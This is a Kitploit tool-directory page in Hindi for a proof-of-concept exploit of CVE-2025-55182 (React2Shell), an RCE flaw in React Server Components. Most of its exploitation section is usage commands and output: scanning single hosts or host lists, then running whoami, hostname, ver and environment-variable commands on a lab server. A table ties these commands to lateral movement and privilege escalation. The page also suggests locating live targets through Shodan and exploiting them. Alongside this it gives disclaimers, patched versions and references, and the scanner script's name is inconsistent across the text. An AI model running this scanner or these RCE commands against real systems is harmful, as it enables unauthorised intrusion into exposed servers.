Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-PoC-CVE-2025-55182 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-55182 (React2Shell) RCE भेद्यता के लिए React सर्वर घटकों में। इसमें संवेदनशील होस्ट के लिए एक स्कैनर और दूरस्थ कमांड निष्पादन के लिए एक शेल स्क्रिप्ट शामिल है। केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। | Kitploit
उपकरण/GitHubGitHub/eagle-nett/react2shell-poc-cve-2025-55182
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubeagle-nett/react2shell-poc-cve-2025-55182

React2Shell-PoC-CVE-2025-55182

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-55182 (React2Shell) RCE भेद्यता के लिए React सर्वर घटकों में। इसमें संवेदनशील होस्ट के लिए एक स्कैनर और दूरस्थ कमांड निष्पादन के लिए एक शेल स्क्रिप्ट शामिल है। केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

React2Shell (CVE-2025-55182) का शोषण अनुकरण

नोट:

  • यह दस्तावेज़ केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।
  • बिना अनुमति के सिस्टम पर हमला करने के लिए उपयोग न करें।

1. अवलोकन

CVE-2025-55182, जिसे React2Shell के नाम से भी जाना जाता है, एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी है जो React सर्वर घटकों (RSC) को प्रभावित करती है। यह क्लाइंट और सर्वर के बीच संचार के लिए Flight प्रोटोकॉल का उपयोग करता है। जब क्लाइंट डेटा का अनुरोध करता है, तो सर्वर एक पेलोड प्राप्त करता है, इस पेलोड को पार्स करता है, जो हमलावर को दुर्भावनापूर्ण संरचनाओं या मनमाने कोड को इंजेक्ट करने की अनुमति दे सकता है जिसे React वैध मानता है।

शीर्षकविवरण
गंभीरतागंभीर (CVSS 10.0)
प्रकारअसुरक्षित डिसीरियलाइज़ेशन (CWE-502)
हमला विधिदूरस्थ, प्रमाणीकरण की आवश्यकता नहीं
प्रभावित संस्करण:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 और Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. कारण

सर्वर क्लाइंट से पेलोड को बिना पूर्ण सत्यापन के संसाधित करता है, जो हमलावर को अनुमति देता है:

  • दुर्भावनापूर्ण पेलोड इंजेक्ट करना
  • सर्वर पर कोड निष्पादित करना
  • उपयोगकर्ता प्रमाणीकरण की आवश्यकता के बिना शोषण किया जा सकता है क्योंकि यह प्रमाणीकरण-पूर्व कमजोरी है।

इस कमजोरी से संबंधित शोषण गतिविधियाँ 5 दिसंबर 2025 से पाई गई हैं। अधिकांश सफल शोषण हमले समूहों के मूल्यांकन से उत्पन्न हुए हैं। विंडोज और लिनक्स दोनों वातावरण प्रभावित हैं।

3. प्रयोग

स्थापना

root@kitploit:~
pip install -r requirements.txt

एक कमजोर सर्वर स्कैन करें:

root@kitploit:~
python3 scanner.py -u https://example.com

स्कैन करने का पथ दर्ज करें (यहाँ मैं अपना कमजोर सर्वर दर्ज कर रहा हूँ: http://192.168.10.1:3000)

image

प्राप्त परिणाम:

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

इसके अलावा आप अपने शोषण उद्देश्य के अनुसार अतिरिक्त स्कैन कर सकते हैं:

होस्टों की सूची स्कैन करें:

root@kitploit:~
python3 scanner.py -l hosts.txt

एकाधिक थ्रेड्स से स्कैन करें और परिणाम सहेजें:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

कस्टम हेडर के साथ स्कैन करें:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

विंडोज लक्ष्यों को स्कैन करें:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

सुरक्षित साइड-चैनल पहचान विधि का उपयोग करें:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

जैसा कि आप देख सकते हैं, हम एक सुरक्षा कमजोरी का सामना कर रहे हैं, जिसका अर्थ है कि हमारा प्रदान किया गया सर्वर हमलावर द्वारा हमले के लिए असुरक्षित है।


Nuclei

अब हम Nuclei का उपयोग करके जाँच करेंगे कि उपरोक्त सर्वर में कौन सी कमजोरी है और क्या इसका POC है। यह सुविधा कस्टम अनुरोध भेजकर, गलत अलार्म (false positive) को कम करके और समानांतर स्कैनिंग का समर्थन करके काम करती है।

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

प्राप्त परिणाम

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

सिस्टम ने पता लगाया है कि यह सर्वर कमजोर है और CVE-2025-55182 कमजोरी द्वारा शोषण किया जा सकता है। और इससे आप देख सकते हैं कि यह एक काफी खतरनाक और महत्वपूर्ण कमजोरी है, जिसके कई POC सोशल प्लेटफॉर्म पर उपलब्ध हैं। ☺☺☺

4. शोषण कैसे करें

आप देख सकते हैं कि उपरोक्त अनुप्रयोग में सुरक्षा कमजोरी के अस्तित्व की पुष्टि करने के लिए यह जानकारी पर्याप्त है। यह साबित करने के लिए कि इस एप्लिकेशन का उपयोग कमांड चलाने या दूरस्थ रूप से कोड निष्पादित करने के लिए किया जा सकता है, मैं PoC शुरू करूंगा।

root@kitploit:~
chmod +x scanner.sh

उपयोग

root@kitploit:~
# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com

# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

अर्थ:

सर्वर प्रक्रिया चलाने वाले वर्तमान उपयोगकर्ता को लौटाता है

पहचानने में मदद करता है:

  • एप्लिकेशन किस उपयोगकर्ता के अंतर्गत चल रहा है
  • अनुमति स्तर (निम्न विशेषाधिकार या व्यवस्थापक)

=> यह RCE की सफलता की पुष्टि करने के लिए सबसे बुनियादी कमांड है

नोट

  • -d, --domain - domain/URL
  • -c, --command - निष्पादित करने का आदेश (जैसे: whoami, hostname,...)

उदाहरण

root@kitploit:~
# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

निष्पादन के बाद चित्रण छवि

image

यह सफल शोषण के बाद प्रारंभिक टोही (initial reconnaissance) कदम है।

हमें पुष्टि करने में मदद करता है: RCE काम कर रहा है, ऑपरेटिंग सिस्टम की पहचान करें,...

ध्यान दें

चूंकि यह प्रयोग मैं व्यक्तिगत लैब वातावरण में प्रदर्शित कर रहा हूँ ताकि अवैध गतिविधियों से बचा जा सके, इसलिए डेटा चुराने के लिए HTTP हेडर का उपयोग, बड़े आउटपुट या विशेष वर्ण निम्न का कारण बन सकते हैं:

  • ERR_INVALID_CHAR
  • प्रतिक्रिया कम करना
  • Timeouts
image

छोटे कमांड (जैसे: whoami, ver) उपरोक्त परीक्षण वातावरण में प्रदर्शित करने के लिए अधिक विश्वसनीय हैं।

यदि आप चाहें तो Shodan का उपयोग करके वास्तविक वातावरण में सीधे IP पतों की जांच कर सकते हैं और अपने उपरोक्त प्रयोग के अनुसार शोषण कर सकते हैं (अनुशंसित नहीं)।

image

जैसा कि ऊपर बताया गया है। यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इस उपकरण का उपयोग उन सिस्टमों पर परीक्षण करने के लिए न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।

5. कमजोरी को ठीक करने के कुछ तरीके

  • क्लाइंट से डेटा पर भरोसा न करें
  • इनपुट को कड़ाई से मान्य करें
  • संस्करण अपडेट करें
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. अतिरिक्त संदर्भ

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
टूल डाउनलोड करें
निष्पादित आदेशों का अर्थविवरण
मशीन का नाम (होस्ट नाम) लौटाता हैउपयोग: - प्रभावित सिस्टम की पहचान करना - पार्श्व आंदोलन (lateral movement) के लिए (आंतरिक वातावरण में)
ऑपरेटिंग सिस्टम संस्करण निर्धारित करेंमहत्वपूर्ण: - आगे के शोषण की संभावना (विशेषाधिकार वृद्धि) का आकलन करना - उपयुक्त एक्सप्लॉइट चुनना
कमांड निष्पादन की जाँच करेंपेलोड / स्कैनर को डीबग करने के लिए उपयोग करें
वर्तमान उपयोगकर्ता नाम लौटाता हैइस मामले में: - उपयोगकर्ता ADMIN है → उच्च विशेषाधिकार हो सकते हैं - कुछ विंडोज मामलों में whoami से अधिक महत्वपूर्ण
मशीन का नाम लौटाता हैपर्यावरण चर के माध्यम से मशीन का नाम लौटाता है